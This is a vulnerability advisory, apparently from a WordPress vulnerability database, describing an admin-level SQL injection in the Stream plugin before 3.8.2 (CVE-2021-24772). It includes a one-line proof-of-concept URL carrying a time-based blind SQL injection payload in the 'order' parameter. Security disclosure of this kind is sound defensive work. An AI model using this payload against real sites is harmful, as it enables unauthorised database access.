WordPress Plugin Vulnerabilities

Stream < 3.8.2 - Admin+ SQL Injection

Description

The plugin does not sanitise and validate the order GET parameter from the Stream Records admin dashboard before using it in a SQL statement, leading to an SQL injection issue.

Proof of Concept

https://example.com/wp-admin/admin.php?page=wp_stream&order=+AND+(SELECT+9940+FROM+(SELECT(SLEEP(5)))vqNl)

Affects Plugins

Plugin icon
stream
Fixed in 3.8.2

References

CVE
CVE-2021-24772
URL
https://plugins.trac.wordpress.org/changeset/2615811/stream

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
6.8 (medium)

Miscellaneous

Original Researcher
bl4derunner
Submitter
Anton Sarsadskikh
Verified
Yes
WPVDB ID
b9d4f2ad-2f12-4822-817d-982a016af85d

Timeline

Publicly Published
2021-10-18 (about 2 years ago)
Added
2021-10-18 (about 2 years ago)
Last Updated
2022-04-14 (about 2 years ago)

Other

Published
Title
Published
2021-08-22
Title
WordPress Page Contact <= 1.0 - Authenticated (editor+) SQL Injection
Published
2021-12-27
Title
WP Cookie User Info < 1.0.9 - Admin+ SQL Injection
Published
2014-08-01
Title
ForumConverter - SQL Injection
Published
2022-05-17
Title
Bestbooks <= 2.6.3 - Unauthenticated SQLi
Published
2022-04-12
Title
Order Listener for WooCommerce < 3.2.2 - Unauthenticated SQLi